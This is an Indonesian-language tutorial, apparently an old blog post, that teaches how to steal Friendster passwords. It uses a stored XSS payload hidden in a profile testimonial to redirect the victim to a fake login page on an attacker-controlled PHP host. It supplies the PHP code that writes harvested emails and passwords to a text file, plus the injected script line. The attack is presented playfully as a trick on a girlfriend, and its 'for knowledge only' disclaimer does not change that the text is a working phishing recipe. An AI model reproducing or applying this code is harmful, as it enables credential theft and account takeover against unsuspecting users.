Penerapan Social Engineering untuk mendapatkan password di Friendster
Sekali lagi Artikel ini
hanya ditujukan bagi temen2 yg belum mengetahui teknik ini. Jika
temen2(terutama for 3133t) Sudah tahu teknik ini SAYA MOHON STOP!!
STOP!! STOP!! STOP!! STOP!! STOP!! tetapi bila anda tetap sja Ngotot
ingin meneruskan saya tidak bisa memaksa anda…
Lanjutt ….
Akhir-akhir
ini banyak yg membicarakannya, bahkan sedang menjadi berita hangat.
Mngkin para 3133t sudah menemukannya hampir 2 tahun yg lalu. Sebagaimna
telah dijelaskan pada artikel sebelumnya (WuPz, jagonya dll).
Testimonial Redirect bisa jadi berabe bgt kalo disalah gunakan.
Artinya?? cara tersebut bisa digunain buat ngedapetin password,
cookies, or perhatian lebih dari doi ama kita ;)) n laen-laen .. 
.
So langsung saja kita menuju acara puncak …
Pertama-tama yg mesti kita siapin :
1. Teh manis penghangat malam.
2. Jangan Lupa cemilan yg bikin Kriuk .. kriuk …
3. Web Hosting yg support PHP. Cari di paman Google banyak..
4. Upload file index.htm (ada di source).
5. Sertakan code php dan JavaScript di bawah ini dan " SAVE As " sesuai dg nama link yg dituju pada Form Login.
$email = $_POST[email];
$password = $_POST[password];
$fl = fopen(’password.txt’, ‘a’);
fwrite($fl, "$email . $password \n\n");
fclose($fl);
?>
window.location=”http://www.friendster.com/index.php”;
Dan upload file diatas ke www.webyangsupportphp.com
6.
Buat file Text kosong dengan nama Sesuai perintah Open pada php code di
atas. Jangan lupa CHMOD diganti sesuai dg kebutuhan kamu!!.
7. kirim testi dg :
hai syang .. gimna kabarna, kagen nie .. <script>window.location=" http://webyangsupportphp.com/index.htm";</script> kpn ke Jogja ..
nah .. Setelah sang pacar penerima testi membuka "New Testimonials",
maka sesuai dg perintah yang berada di JavaScript => window.location
<= yg disisipkan maka link akan menuju ke
http://webyangsupportphp.com/index.htm . setelah terbuka, secara tanpa
sadar sang pacar mengira halaman yg terbuka adalah sungguhan. Ya !!!!
tanpa disuruh, dibelai-belai, n tanpa rayuan maut pun sang pacar akan
dg rela hati mengisi Form login tipuan.
Akhirnya dg pura-pura
tidak tahu, muka bego, sedikit bodoh. Si pengirim testi menawarkan
jasanya untuk sang pacar tercinta… =] 
)
Selain itu teknik diatas akan terlihat seperti aslinya jika
menggunakan " OVERLAY GENERATOR " pada profil fs pada saat pengiriman
testimonial yg berisi html code ( index.htm). Dg mengganti link Relatif
menjadi absolut(baca S.I.H lebih lanjut) pada form login di index.htm
maka pada saat pengiriman data akan menuju ke
http://webyangsupportphp.com/login.php
Kesimpulan :
# Hacking tidak selamanya menggunakan " TOOLS "
# Kelemahan XSS merupakan bahaya besar
# Teknik ini semata-mata hanya untuk pengetahuan. Resiko ditanggung anda sendiri !!!!
Thanks To :
Allah SWT
———
-V-i-e- My Queen
$Jasakom Community
$Aat Shadewa - thanks 4 your knowledge.
$Xcode Community
$h_iem_ura, daddy, otoy’s, rahmat-mh, n 2 friends that can’t be says one by one.
$komp butut gw!!
$$$ Knowledge is belongs to world $$$
###numpang_lewat###
